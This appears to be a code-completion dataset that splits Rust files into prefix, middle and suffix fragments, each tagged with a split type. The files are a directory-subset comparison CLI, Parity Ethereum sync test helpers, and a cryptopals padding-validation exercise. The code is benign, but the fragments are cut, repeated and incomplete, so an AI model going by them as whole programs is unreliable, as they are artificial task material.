for missing_file in subset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}\n",
subset_missing_result.len(),
superset_dirpath.display()
);
for missing_file in superset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
subset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
superset_missing_result.len(),
subset_dirpath.display()
);
} else {
// Run program
let result = program.report_missing(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
result.len(),
superset_dirpath.display()
);
}
}
|
{
let filename_comparator = file_comparable::FileNameComparable::new();
Box::new(DirectoryComparableWithFileComparable::new(
filename_comparator,
))
}
|
conditional_block
|
main.rs
|
#[macro_use]
extern crate serde_derive;
extern crate docopt;
use docopt::Docopt;
use std::fs;
use std::path::PathBuf;
mod directory_files;
use directory_files::*;
mod file_comparable;
mod directory_comparable;
use directory_comparable::*;
/// The Docopt usage string
const USAGE: &'static str = "
Usage: subset [-q | -v] [-t | -n] [-b] <dir1> <dir2>
subset --help
subset lets you compare two directory structures.
We are going to check whether the files in dir1 are a subset of the files in dir2, regardless of directory structure.
We are going to check to see that every file under the directory structure in dir1 must be present somewhere in the dir2 directory structure, regardless of where in the directory structure or definitions of equality.
There are multiple definitions of file equality that you can specify using flags, but the default is a MD5 hash of the contents of the file. It is conceivable that you can define a custom equality strategy that relies on other parameters, such as file name, subdirectory location, metadata, EXIF data, etc. The possibilities are endless.
Common options:
-h, --help Show this usage message.
-q, --quiet Do not print all mappings.
-v, --verbose Print all mappings.
-t, --trivial Will swap out the MD5 comparison for a trivial comparison (everything is equal). (This is to test extensibility.)
-n, --name Will swap out the MD5 comparison for a filename comparison.
-b, --bidirectional Also check whether dir2 is also a subset of dir1 (essentially, set equality) and print out missing lists for both directories.
";
// We should think about moving away from DocOpt soon since it uses RustcDecodable,
// which is deprecated in favor of serde?
/// Parsing comand line arguments here
#[derive(Debug, Deserialize)]
struct Args {
arg_dir1: String,
arg_dir2: String,
flag_quiet: bool,
flag_verbose: bool,
flag_trivial: bool,
flag_name: bool,
flag_bidirectional: bool,
}
/// This should be the UI layer as much as possible-- it parses the command line arguments,
/// hands it off to our business logic, and then collects the answers back and print them.
fn main()
|
} else {
let md5_comparator = file_comparable::Md5Comparable::new();
Box::new(DirectoryComparableWithFileComparable::new(md5_comparator))
};
let superset_dirpath = PathBuf::from(&args.arg_dir2);
// eww... why do we have to coerce these Box types again?
// (again, only two of these Box types in existence so not so bad...)
let mut superset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&superset_dirpath));
let subset_dirpath = PathBuf::from(&args.arg_dir1);
let mut subset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&subset_dirpath)); // mut needed for.by_ref
if args.flag_bidirectional {
// Run program
let (subset_missing_result, superset_missing_result) =
program.report_missing_bidirectional(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in subset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}\n",
subset_missing_result.len(),
superset_dirpath.display()
);
for missing_file in superset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
subset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
superset_missing_result.len(),
subset_dirpath.display()
);
} else {
// Run program
let result = program.report_missing(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
result.len(),
superset_dirpath.display()
);
}
}
|
{
let args: Args = Docopt::new(USAGE)
.and_then(|d| d.deserialize())
.unwrap_or_else(|e| e.exit());
println!("Comparing {} with {}", args.arg_dir1, args.arg_dir2);
// Make sure both of our inputs are valid directories
fs::read_dir(&args.arg_dir1).expect("Directory cannot be read!");
fs::read_dir(&args.arg_dir2).expect("Directory cannot be read!");
// Main logic: using dynamic dispatch
// (I don't feel too bad about boxing here because this is essentially a singleton.)
let mut program: Box<DirectoryComparable> = if args.flag_trivial {
Box::new(TrivialDirectoryComparable {})
} else if args.flag_name {
let filename_comparator = file_comparable::FileNameComparable::new();
Box::new(DirectoryComparableWithFileComparable::new(
filename_comparator,
))
|
identifier_body
|
main.rs
|
#[macro_use]
extern crate serde_derive;
extern crate docopt;
use docopt::Docopt;
use std::fs;
use std::path::PathBuf;
mod directory_files;
use directory_files::*;
mod file_comparable;
|
use directory_comparable::*;
/// The Docopt usage string
const USAGE: &'static str = "
Usage: subset [-q | -v] [-t | -n] [-b] <dir1> <dir2>
subset --help
subset lets you compare two directory structures.
We are going to check whether the files in dir1 are a subset of the files in dir2, regardless of directory structure.
We are going to check to see that every file under the directory structure in dir1 must be present somewhere in the dir2 directory structure, regardless of where in the directory structure or definitions of equality.
There are multiple definitions of file equality that you can specify using flags, but the default is a MD5 hash of the contents of the file. It is conceivable that you can define a custom equality strategy that relies on other parameters, such as file name, subdirectory location, metadata, EXIF data, etc. The possibilities are endless.
Common options:
-h, --help Show this usage message.
-q, --quiet Do not print all mappings.
-v, --verbose Print all mappings.
-t, --trivial Will swap out the MD5 comparison for a trivial comparison (everything is equal). (This is to test extensibility.)
-n, --name Will swap out the MD5 comparison for a filename comparison.
-b, --bidirectional Also check whether dir2 is also a subset of dir1 (essentially, set equality) and print out missing lists for both directories.
";
// We should think about moving away from DocOpt soon since it uses RustcDecodable,
// which is deprecated in favor of serde?
/// Parsing comand line arguments here
#[derive(Debug, Deserialize)]
struct Args {
arg_dir1: String,
arg_dir2: String,
flag_quiet: bool,
flag_verbose: bool,
flag_trivial: bool,
flag_name: bool,
flag_bidirectional: bool,
}
/// This should be the UI layer as much as possible-- it parses the command line arguments,
/// hands it off to our business logic, and then collects the answers back and print them.
fn main() {
let args: Args = Docopt::new(USAGE)
.and_then(|d| d.deserialize())
.unwrap_or_else(|e| e.exit());
println!("Comparing {} with {}", args.arg_dir1, args.arg_dir2);
// Make sure both of our inputs are valid directories
fs::read_dir(&args.arg_dir1).expect("Directory cannot be read!");
fs::read_dir(&args.arg_dir2).expect("Directory cannot be read!");
// Main logic: using dynamic dispatch
// (I don't feel too bad about boxing here because this is essentially a singleton.)
let mut program: Box<DirectoryComparable> = if args.flag_trivial {
Box::new(TrivialDirectoryComparable {})
} else if args.flag_name {
let filename_comparator = file_comparable::FileNameComparable::new();
Box::new(DirectoryComparableWithFileComparable::new(
filename_comparator,
))
} else {
let md5_comparator = file_comparable::Md5Comparable::new();
Box::new(DirectoryComparableWithFileComparable::new(md5_comparator))
};
let superset_dirpath = PathBuf::from(&args.arg_dir2);
// eww... why do we have to coerce these Box types again?
// (again, only two of these Box types in existence so not so bad...)
let mut superset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&superset_dirpath));
let subset_dirpath = PathBuf::from(&args.arg_dir1);
let mut subset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&subset_dirpath)); // mut needed for.by_ref
if args.flag_bidirectional {
// Run program
let (subset_missing_result, superset_missing_result) =
program.report_missing_bidirectional(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in subset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}\n",
subset_missing_result.len(),
superset_dirpath.display()
);
for missing_file in superset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
subset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
superset_missing_result.len(),
subset_dirpath.display()
);
} else {
// Run program
let result = program.report_missing(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
result.len(),
superset_dirpath.display()
);
}
}
|
mod directory_comparable;
|
random_line_split
|
helpers.rs
|
// Copyright 2015, 2016 Ethcore (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use util::*;
use network::*;
use tests::snapshot::*;
use ethcore::client::{TestBlockChainClient, BlockChainClient};
use ethcore::header::BlockNumber;
use ethcore::snapshot::SnapshotService;
use sync_io::SyncIo;
use api::WARP_SYNC_PROTOCOL_ID;
use chain::ChainSync;
use ::SyncConfig;
pub struct TestIo<'p> {
pub chain: &'p mut TestBlockChainClient,
pub snapshot_service: &'p TestSnapshotService,
pub queue: &'p mut VecDeque<TestPacket>,
pub sender: Option<PeerId>,
pub to_disconnect: HashSet<PeerId>,
overlay: RwLock<HashMap<BlockNumber, Bytes>>,
}
impl<'p> TestIo<'p> {
pub fn new(chain: &'p mut TestBlockChainClient, ss: &'p TestSnapshotService, queue: &'p mut VecDeque<TestPacket>, sender: Option<PeerId>) -> TestIo<'p> {
TestIo {
chain: chain,
snapshot_service: ss,
queue: queue,
sender: sender,
to_disconnect: HashSet::new(),
overlay: RwLock::new(HashMap::new()),
}
}
}
impl<'p> SyncIo for TestIo<'p> {
fn disable_peer(&mut self, peer_id: PeerId) {
self.disconnect_peer(peer_id);
}
fn disconnect_peer(&mut self, peer_id: PeerId) {
self.to_disconnect.insert(peer_id);
}
fn is_expired(&self) -> bool {
false
}
fn respond(&mut self, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: self.sender.unwrap()
});
Ok(())
}
fn
|
(&mut self, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: peer_id,
});
Ok(())
}
fn send_protocol(&mut self, _protocol: ProtocolId, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.send(peer_id, packet_id, data)
}
fn chain(&self) -> &BlockChainClient {
self.chain
}
fn snapshot_service(&self) -> &SnapshotService {
self.snapshot_service
}
fn peer_session_info(&self, _peer_id: PeerId) -> Option<SessionInfo> {
None
}
fn eth_protocol_version(&self, _peer: PeerId) -> u8 {
63
}
fn protocol_version(&self, protocol: &ProtocolId, peer_id: PeerId) -> u8 {
if protocol == &WARP_SYNC_PROTOCOL_ID { 1 } else { self.eth_protocol_version(peer_id) }
}
fn chain_overlay(&self) -> &RwLock<HashMap<BlockNumber, Bytes>> {
&self.overlay
}
}
pub struct TestPacket {
pub data: Bytes,
pub packet_id: PacketId,
pub recipient: PeerId,
}
pub struct TestPeer {
pub chain: TestBlockChainClient,
pub snapshot_service: Arc<TestSnapshotService>,
pub sync: RwLock<ChainSync>,
pub queue: VecDeque<TestPacket>,
}
pub struct TestNet {
pub peers: Vec<TestPeer>,
pub started: bool,
}
impl TestNet {
pub fn new(n: usize) -> TestNet {
Self::new_with_fork(n, None)
}
pub fn new_with_fork(n: usize, fork: Option<(BlockNumber, H256)>) -> TestNet {
let mut net = TestNet {
peers: Vec::new(),
started: false,
};
for _ in 0..n {
let chain = TestBlockChainClient::new();
let mut config = SyncConfig::default();
config.fork_block = fork;
let ss = Arc::new(TestSnapshotService::new());
let sync = ChainSync::new(config, &chain);
net.peers.push(TestPeer {
sync: RwLock::new(sync),
snapshot_service: ss,
chain: chain,
queue: VecDeque::new(),
});
}
net
}
pub fn peer(&self, i: usize) -> &TestPeer {
self.peers.get(i).unwrap()
}
pub fn peer_mut(&mut self, i: usize) -> &mut TestPeer {
self.peers.get_mut(i).unwrap()
}
pub fn start(&mut self) {
for peer in 0..self.peers.len() {
for client in 0..self.peers.len() {
if peer!= client {
let mut p = self.peers.get_mut(peer).unwrap();
p.sync.write().restart(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)));
p.sync.write().on_peer_connected(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)), client as PeerId);
}
}
}
}
pub fn sync_step(&mut self) {
for peer in 0..self.peers.len() {
if let Some(packet) = self.peers[peer].queue.pop_front() {
let disconnecting = {
let mut p = self.peers.get_mut(packet.recipient).unwrap();
trace!("--- {} -> {} ---", peer, packet.recipient);
let to_disconnect = {
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
ChainSync::dispatch_packet(&p.sync, &mut io, peer as PeerId, packet.packet_id, &packet.data);
io.to_disconnect
};
for d in &to_disconnect {
// notify this that disconnecting peers are disconnecting
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(*d));
p.sync.write().on_peer_aborting(&mut io, *d);
}
to_disconnect
};
for d in &disconnecting {
// notify other peers that this peer is disconnecting
let mut p = self.peers.get_mut(*d).unwrap();
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
p.sync.write().on_peer_aborting(&mut io, peer as PeerId);
}
}
self.sync_step_peer(peer);
}
}
pub fn sync_step_peer(&mut self, peer_num: usize) {
let mut peer = self.peer_mut(peer_num);
peer.sync.write().maintain_sync(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn restart_peer(&mut self, i: usize) {
let peer = self.peer_mut(i);
peer.sync.write().restart(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn sync(&mut self) -> u32 {
self.start();
let mut total_steps = 0;
while!self.done() {
self.sync_step();
total_steps += 1;
}
total_steps
}
pub fn sync_steps(&mut self, count: usize) {
if!self.started {
self.start();
self.started = true;
}
for _ in 0..count {
self.sync_step();
}
}
pub fn done(&self) -> bool {
self.peers.iter().all(|p| p.queue.is_empty())
}
pub fn trigger_chain_new_blocks(&mut self, peer_id: usize) {
let mut peer = self.peer_mut(peer_id);
peer.sync.write().chain_new_blocks(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None), &[], &[], &[], &[], &[]);
}
}
|
send
|
identifier_name
|
helpers.rs
|
// Copyright 2015, 2016 Ethcore (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use util::*;
use network::*;
use tests::snapshot::*;
use ethcore::client::{TestBlockChainClient, BlockChainClient};
use ethcore::header::BlockNumber;
use ethcore::snapshot::SnapshotService;
use sync_io::SyncIo;
use api::WARP_SYNC_PROTOCOL_ID;
use chain::ChainSync;
use ::SyncConfig;
pub struct TestIo<'p> {
pub chain: &'p mut TestBlockChainClient,
pub snapshot_service: &'p TestSnapshotService,
|
pub queue: &'p mut VecDeque<TestPacket>,
pub sender: Option<PeerId>,
pub to_disconnect: HashSet<PeerId>,
overlay: RwLock<HashMap<BlockNumber, Bytes>>,
}
impl<'p> TestIo<'p> {
pub fn new(chain: &'p mut TestBlockChainClient, ss: &'p TestSnapshotService, queue: &'p mut VecDeque<TestPacket>, sender: Option<PeerId>) -> TestIo<'p> {
TestIo {
chain: chain,
snapshot_service: ss,
queue: queue,
sender: sender,
to_disconnect: HashSet::new(),
overlay: RwLock::new(HashMap::new()),
}
}
}
impl<'p> SyncIo for TestIo<'p> {
fn disable_peer(&mut self, peer_id: PeerId) {
self.disconnect_peer(peer_id);
}
fn disconnect_peer(&mut self, peer_id: PeerId) {
self.to_disconnect.insert(peer_id);
}
fn is_expired(&self) -> bool {
false
}
fn respond(&mut self, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: self.sender.unwrap()
});
Ok(())
}
fn send(&mut self, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: peer_id,
});
Ok(())
}
fn send_protocol(&mut self, _protocol: ProtocolId, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.send(peer_id, packet_id, data)
}
fn chain(&self) -> &BlockChainClient {
self.chain
}
fn snapshot_service(&self) -> &SnapshotService {
self.snapshot_service
}
fn peer_session_info(&self, _peer_id: PeerId) -> Option<SessionInfo> {
None
}
fn eth_protocol_version(&self, _peer: PeerId) -> u8 {
63
}
fn protocol_version(&self, protocol: &ProtocolId, peer_id: PeerId) -> u8 {
if protocol == &WARP_SYNC_PROTOCOL_ID { 1 } else { self.eth_protocol_version(peer_id) }
}
fn chain_overlay(&self) -> &RwLock<HashMap<BlockNumber, Bytes>> {
&self.overlay
}
}
pub struct TestPacket {
pub data: Bytes,
pub packet_id: PacketId,
pub recipient: PeerId,
}
pub struct TestPeer {
pub chain: TestBlockChainClient,
pub snapshot_service: Arc<TestSnapshotService>,
pub sync: RwLock<ChainSync>,
pub queue: VecDeque<TestPacket>,
}
pub struct TestNet {
pub peers: Vec<TestPeer>,
pub started: bool,
}
impl TestNet {
pub fn new(n: usize) -> TestNet {
Self::new_with_fork(n, None)
}
pub fn new_with_fork(n: usize, fork: Option<(BlockNumber, H256)>) -> TestNet {
let mut net = TestNet {
peers: Vec::new(),
started: false,
};
for _ in 0..n {
let chain = TestBlockChainClient::new();
let mut config = SyncConfig::default();
config.fork_block = fork;
let ss = Arc::new(TestSnapshotService::new());
let sync = ChainSync::new(config, &chain);
net.peers.push(TestPeer {
sync: RwLock::new(sync),
snapshot_service: ss,
chain: chain,
queue: VecDeque::new(),
});
}
net
}
pub fn peer(&self, i: usize) -> &TestPeer {
self.peers.get(i).unwrap()
}
pub fn peer_mut(&mut self, i: usize) -> &mut TestPeer {
self.peers.get_mut(i).unwrap()
}
pub fn start(&mut self) {
for peer in 0..self.peers.len() {
for client in 0..self.peers.len() {
if peer!= client {
let mut p = self.peers.get_mut(peer).unwrap();
p.sync.write().restart(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)));
p.sync.write().on_peer_connected(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)), client as PeerId);
}
}
}
}
pub fn sync_step(&mut self) {
for peer in 0..self.peers.len() {
if let Some(packet) = self.peers[peer].queue.pop_front() {
let disconnecting = {
let mut p = self.peers.get_mut(packet.recipient).unwrap();
trace!("--- {} -> {} ---", peer, packet.recipient);
let to_disconnect = {
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
ChainSync::dispatch_packet(&p.sync, &mut io, peer as PeerId, packet.packet_id, &packet.data);
io.to_disconnect
};
for d in &to_disconnect {
// notify this that disconnecting peers are disconnecting
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(*d));
p.sync.write().on_peer_aborting(&mut io, *d);
}
to_disconnect
};
for d in &disconnecting {
// notify other peers that this peer is disconnecting
let mut p = self.peers.get_mut(*d).unwrap();
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
p.sync.write().on_peer_aborting(&mut io, peer as PeerId);
}
}
self.sync_step_peer(peer);
}
}
pub fn sync_step_peer(&mut self, peer_num: usize) {
let mut peer = self.peer_mut(peer_num);
peer.sync.write().maintain_sync(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn restart_peer(&mut self, i: usize) {
let peer = self.peer_mut(i);
peer.sync.write().restart(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn sync(&mut self) -> u32 {
self.start();
let mut total_steps = 0;
while!self.done() {
self.sync_step();
total_steps += 1;
}
total_steps
}
pub fn sync_steps(&mut self, count: usize) {
if!self.started {
self.start();
self.started = true;
}
for _ in 0..count {
self.sync_step();
}
}
pub fn done(&self) -> bool {
self.peers.iter().all(|p| p.queue.is_empty())
}
pub fn trigger_chain_new_blocks(&mut self, peer_id: usize) {
let mut peer = self.peer_mut(peer_id);
peer.sync.write().chain_new_blocks(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None), &[], &[], &[], &[], &[]);
}
}
|
random_line_split
|
|
helpers.rs
|
// Copyright 2015, 2016 Ethcore (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use util::*;
use network::*;
use tests::snapshot::*;
use ethcore::client::{TestBlockChainClient, BlockChainClient};
use ethcore::header::BlockNumber;
use ethcore::snapshot::SnapshotService;
use sync_io::SyncIo;
use api::WARP_SYNC_PROTOCOL_ID;
use chain::ChainSync;
use ::SyncConfig;
pub struct TestIo<'p> {
pub chain: &'p mut TestBlockChainClient,
pub snapshot_service: &'p TestSnapshotService,
pub queue: &'p mut VecDeque<TestPacket>,
pub sender: Option<PeerId>,
pub to_disconnect: HashSet<PeerId>,
overlay: RwLock<HashMap<BlockNumber, Bytes>>,
}
impl<'p> TestIo<'p> {
pub fn new(chain: &'p mut TestBlockChainClient, ss: &'p TestSnapshotService, queue: &'p mut VecDeque<TestPacket>, sender: Option<PeerId>) -> TestIo<'p> {
TestIo {
chain: chain,
snapshot_service: ss,
queue: queue,
sender: sender,
to_disconnect: HashSet::new(),
overlay: RwLock::new(HashMap::new()),
}
}
}
impl<'p> SyncIo for TestIo<'p> {
fn disable_peer(&mut self, peer_id: PeerId) {
self.disconnect_peer(peer_id);
}
fn disconnect_peer(&mut self, peer_id: PeerId) {
self.to_disconnect.insert(peer_id);
}
fn is_expired(&self) -> bool {
false
}
fn respond(&mut self, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: self.sender.unwrap()
});
Ok(())
}
fn send(&mut self, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: peer_id,
});
Ok(())
}
fn send_protocol(&mut self, _protocol: ProtocolId, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.send(peer_id, packet_id, data)
}
fn chain(&self) -> &BlockChainClient {
self.chain
}
fn snapshot_service(&self) -> &SnapshotService {
self.snapshot_service
}
fn peer_session_info(&self, _peer_id: PeerId) -> Option<SessionInfo> {
None
}
fn eth_protocol_version(&self, _peer: PeerId) -> u8 {
63
}
fn protocol_version(&self, protocol: &ProtocolId, peer_id: PeerId) -> u8 {
if protocol == &WARP_SYNC_PROTOCOL_ID
|
else { self.eth_protocol_version(peer_id) }
}
fn chain_overlay(&self) -> &RwLock<HashMap<BlockNumber, Bytes>> {
&self.overlay
}
}
pub struct TestPacket {
pub data: Bytes,
pub packet_id: PacketId,
pub recipient: PeerId,
}
pub struct TestPeer {
pub chain: TestBlockChainClient,
pub snapshot_service: Arc<TestSnapshotService>,
pub sync: RwLock<ChainSync>,
pub queue: VecDeque<TestPacket>,
}
pub struct TestNet {
pub peers: Vec<TestPeer>,
pub started: bool,
}
impl TestNet {
pub fn new(n: usize) -> TestNet {
Self::new_with_fork(n, None)
}
pub fn new_with_fork(n: usize, fork: Option<(BlockNumber, H256)>) -> TestNet {
let mut net = TestNet {
peers: Vec::new(),
started: false,
};
for _ in 0..n {
let chain = TestBlockChainClient::new();
let mut config = SyncConfig::default();
config.fork_block = fork;
let ss = Arc::new(TestSnapshotService::new());
let sync = ChainSync::new(config, &chain);
net.peers.push(TestPeer {
sync: RwLock::new(sync),
snapshot_service: ss,
chain: chain,
queue: VecDeque::new(),
});
}
net
}
pub fn peer(&self, i: usize) -> &TestPeer {
self.peers.get(i).unwrap()
}
pub fn peer_mut(&mut self, i: usize) -> &mut TestPeer {
self.peers.get_mut(i).unwrap()
}
pub fn start(&mut self) {
for peer in 0..self.peers.len() {
for client in 0..self.peers.len() {
if peer!= client {
let mut p = self.peers.get_mut(peer).unwrap();
p.sync.write().restart(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)));
p.sync.write().on_peer_connected(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)), client as PeerId);
}
}
}
}
pub fn sync_step(&mut self) {
for peer in 0..self.peers.len() {
if let Some(packet) = self.peers[peer].queue.pop_front() {
let disconnecting = {
let mut p = self.peers.get_mut(packet.recipient).unwrap();
trace!("--- {} -> {} ---", peer, packet.recipient);
let to_disconnect = {
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
ChainSync::dispatch_packet(&p.sync, &mut io, peer as PeerId, packet.packet_id, &packet.data);
io.to_disconnect
};
for d in &to_disconnect {
// notify this that disconnecting peers are disconnecting
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(*d));
p.sync.write().on_peer_aborting(&mut io, *d);
}
to_disconnect
};
for d in &disconnecting {
// notify other peers that this peer is disconnecting
let mut p = self.peers.get_mut(*d).unwrap();
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
p.sync.write().on_peer_aborting(&mut io, peer as PeerId);
}
}
self.sync_step_peer(peer);
}
}
pub fn sync_step_peer(&mut self, peer_num: usize) {
let mut peer = self.peer_mut(peer_num);
peer.sync.write().maintain_sync(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn restart_peer(&mut self, i: usize) {
let peer = self.peer_mut(i);
peer.sync.write().restart(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn sync(&mut self) -> u32 {
self.start();
let mut total_steps = 0;
while!self.done() {
self.sync_step();
total_steps += 1;
}
total_steps
}
pub fn sync_steps(&mut self, count: usize) {
if!self.started {
self.start();
self.started = true;
}
for _ in 0..count {
self.sync_step();
}
}
pub fn done(&self) -> bool {
self.peers.iter().all(|p| p.queue.is_empty())
}
pub fn trigger_chain_new_blocks(&mut self, peer_id: usize) {
let mut peer = self.peer_mut(peer_id);
peer.sync.write().chain_new_blocks(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None), &[], &[], &[], &[], &[]);
}
}
|
{ 1 }
|
conditional_block
|
challenge15.rs
|
use aes::{unpad_inplace, Aes128};
|
use crate::errors::*;
pub fn run() -> Result<()> {
{
let mut message = b"ICE ICE BABY\x04\x04\x04\x04".to_vec();
unpad_inplace(&mut message, 16)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
compare_eq(false, b"ICE ICE BABY\x05\x05\x05\x05".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x01\x02\x03\x04".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x03\x03\x03".padding_valid())?;
{
let mut message = b"ICE ICE BABY\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C".to_vec();
unpad_inplace(&mut message, 12)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
Ok(())
}
|
random_line_split
|
|
challenge15.rs
|
use aes::{unpad_inplace, Aes128};
use crate::errors::*;
pub fn
|
() -> Result<()> {
{
let mut message = b"ICE ICE BABY\x04\x04\x04\x04".to_vec();
unpad_inplace(&mut message, 16)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
compare_eq(false, b"ICE ICE BABY\x05\x05\x05\x05".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x01\x02\x03\x04".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x03\x03\x03".padding_valid())?;
{
let mut message = b"ICE ICE BABY\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C".to_vec();
unpad_inplace(&mut message, 12)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
Ok(())
}
|
run
|
identifier_name
|
challenge15.rs
|
use aes::{unpad_inplace, Aes128};
use crate::errors::*;
pub fn run() -> Result<()>
|
{
{
let mut message = b"ICE ICE BABY\x04\x04\x04\x04".to_vec();
unpad_inplace(&mut message, 16)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
compare_eq(false, b"ICE ICE BABY\x05\x05\x05\x05".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x01\x02\x03\x04".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x03\x03\x03".padding_valid())?;
{
let mut message = b"ICE ICE BABY\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C".to_vec();
unpad_inplace(&mut message, 12)?;
